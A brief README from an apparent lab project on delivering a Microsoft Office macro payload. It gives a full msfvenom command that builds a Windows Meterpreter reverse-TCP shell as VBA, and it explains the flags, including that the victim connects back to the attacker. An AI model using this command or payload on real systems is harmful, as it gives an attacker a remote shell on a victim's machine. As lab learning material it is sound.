cddonath/Microsoft-Macro-payload-delivery/README.md

 AI suggested using MSFVenom to create the payload and after looking into it, I realized that it was implemented in metasploite which we have experience with and acess to on our proxmox VMs.
 This was the main website I used to research the flags and how to use them(reading the instruction in the terminal is a bit of a headache for me) https://www.offsec.com/metasploit-unleashed/msfvenom/
 Ultimately the command I came up with was msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f vba.
+* -p
+- the flag to start creating a payload
 - "windows" to target a windows machine(any of the promox machines in our case)
 - "meterpreter" is the interactive shell component
 - "reverse_tcp" makes the victim reach out to our attacking machine